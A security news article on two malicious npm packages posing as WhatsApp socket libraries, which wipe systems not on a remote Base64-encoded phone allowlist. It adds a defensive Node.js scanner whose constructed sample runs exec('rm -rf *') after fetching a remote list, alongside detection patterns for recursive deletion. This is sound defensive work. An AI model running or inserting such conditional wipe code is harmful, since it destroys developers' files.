WhatsApp developers are facing threats from malicious npm packages that come with a remote kill switch.
Two malicious npm packages, Naya-Flore and Nvlore-Hsc, target WhatsApp developers with a remote-controlled kill switch that can wipe a development system. Both pose as WhatsApp socket libraries, and both carry a payload that performs system-wide file deletion with a single command once triggered. They were published by the npm user Nayflore, using the email address idzzcch@gmail.com, and had been downloaded more than 1,110 times within a month (npm download counts include mirrors and automated scanners, so the number of real installs is likely lower). The packages prey on the WhatsApp Business API ecosystem, which serves over 200 million businesses globally and in which developers routinely pull in third-party packages for chatbot development, customer-service automation and messaging integrations.
Researchers at Socket.dev found the malicious logic inside what otherwise looks like standard WhatsApp integration code. It lives in the RequestPairingCode function, a legitimate step that a bot calls during WhatsApp authentication setup. When the function runs, the package fetches a remote list of allowlisted phone numbers from a GitHub repository; the list is Base64-encoded, which hides the numbers from a casual read of the source or the traffic.

The decision itself is simple: if the developer's phone number appears in the remote allowlist, the package behaves normally; for any number not on the list, it runs the destructive payload and wipes the system. Because the allowlist is hosted outside the package, the attacker can change who is targeted at any time without publishing a new version, which is what makes the kill switch remote. The same selectivity helps the attacker stay hidden: the package works as advertised for listed numbers, including whatever numbers the attacker tests with, so a reviewer or sandbox that happens to use one of them sees nothing wrong. Projects that depend on either package should remove it; running npm ls naya-flore nvlore-hsc shows whether either appears in a dependency tree (npm package names are lowercase).
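As an added example, not code from the article, from Socket.dev or from the packages themselves: a small heuristic scanner in Node.js for the pattern described above, a pairing function that fetches a remote allowlist from GitHub, Base64-decodes it and otherwise drops into a shell command. The malicious sample it scans is constructed here to mirror the article's description, not copied from Naya-Flore or Nvlore-Hsc; the GitHub URL, repository path, library name and the rm -rf command in it are assumptions (the article says only that the payload wipes the system). The benign sample is also constructed, to show that an ordinary pairing call is not flagged.

```javascript
// Added example: heuristic scan of JavaScript source for the
// "remote allowlist + conditional shell payload" shape the article
// describes. Not code from naya-flore, nvlore-hsc or Socket.dev.

// Each signal is a regex tested line by line. Weights only order the
// findings for a human reviewer; the verdict uses the combination of
// signals, because Base64 decoding on its own is everywhere in npm.
const SIGNALS = [
  { id: 'remote-fetch', weight: 2,
    // fetch()/axios/https.get/got of a raw GitHub or Gist URL
    re: /\b(?:fetch|axios\.get|https?\.get|got)\s*\(\s*['"`]https?:\/\/(?:raw\.githubusercontent\.com|gist\.github(?:usercontent)?\.com|github\.com)\// },
  { id: 'base64-decode', weight: 1,
    re: /Buffer\.from\s*\(.*?['"]base64['"]\s*\)|\batob\s*\(/ },
  { id: 'shell-exec', weight: 2,
    re: /\b(?:exec|execSync|execFile|execFileSync|spawn|spawnSync)\s*\(/ },
  { id: 'recursive-delete', weight: 3,
    re: /\brm\s+-[A-Za-z]*r|\bfs\.rm(?:Sync)?\s*\(.*?recursive\s*:\s*true|\brimraf\b/ },
  { id: 'pairing-hook', weight: 1,
    re: /requestPairingCode/i },
];

// Returns { flagged, score, hits }, where hits lists every signal with the
// 1-based line it fired on and the trimmed line text for triage.
function scanSource(src) {
  const hits = [];
  src.split('\n').forEach((text, i) => {
    for (const s of SIGNALS) {
      if (s.re.test(text)) hits.push({ id: s.id, line: i + 1, text: text.trim() });
    }
  });
  const ids = new Set(hits.map(h => h.id));
  const score = [...ids].reduce((n, id) => n + SIGNALS.find(s => s.id === id).weight, 0);
  // Flag the kill-switch shape (remote fetch feeding shell execution), or any
  // recursive deletion at all: a messaging library has no business doing either.
  const flagged = ids.has('recursive-delete') || (ids.has('remote-fetch') && ids.has('shell-exec'));
  return { flagged, score, hits };
}

// Constructed sample modelled on the article's description. The URL, the
// repository path and the rm -rf command are assumptions, not taken from
// the real packages.
const CONSTRUCTED_MALICIOUS = [
  "const { exec } = require('child_process');",
  "async function RequestPairingCode(sock, phoneNumber) {",
  "  const res = await fetch('https://raw.githubusercontent.com/example-org/example-repo/main/numbers.txt');",
  "  const allowlist = JSON.parse(Buffer.from(await res.text(), 'base64').toString('utf8'));",
  "  if (!allowlist.includes(phoneNumber)) {",
  "    exec('rm -rf *');   // assumed stand-in for the destructive payload",
  "  }",
  "  return sock.requestPairingCode(phoneNumber);",
  "}",
].join('\n');

// Constructed benign sample: a normal pairing call against a hypothetical
// socket library, with no network fetch and no shell execution.
const CONSTRUCTED_BENIGN = [
  "const { makeSocket } = require('./whatsapp-socket-lib');  // hypothetical library",
  "async function pair(phoneNumber) {",
  "  const sock = makeSocket({ printQRInTerminal: false });",
  "  return sock.requestPairingCode(phoneNumber);",
  "}",
].join('\n');

for (const [label, src] of Object.entries({ constructed_malicious: CONSTRUCTED_MALICIOUS,
                                             constructed_benign: CONSTRUCTED_BENIGN })) {
  const r = scanSource(src);
  const signals = [...new Set(r.hits.map(h => h.id))].join(',');
  console.log(`${label}: flagged=${r.flagged} score=${r.score} signals=${signals}`);
}
```

To use it on an installed dependency, read each .js file under node_modules/<package> with fs.readFileSync and pass the contents to scanSource; the hits give the line to open first. This is a triage heuristic, not proof: it will miss a payload that builds its command from string fragments, and it will raise a remote-fetch hit on any library that legitimately downloads data from GitHub, which is why the verdict requires the fetch to be paired with shell execution.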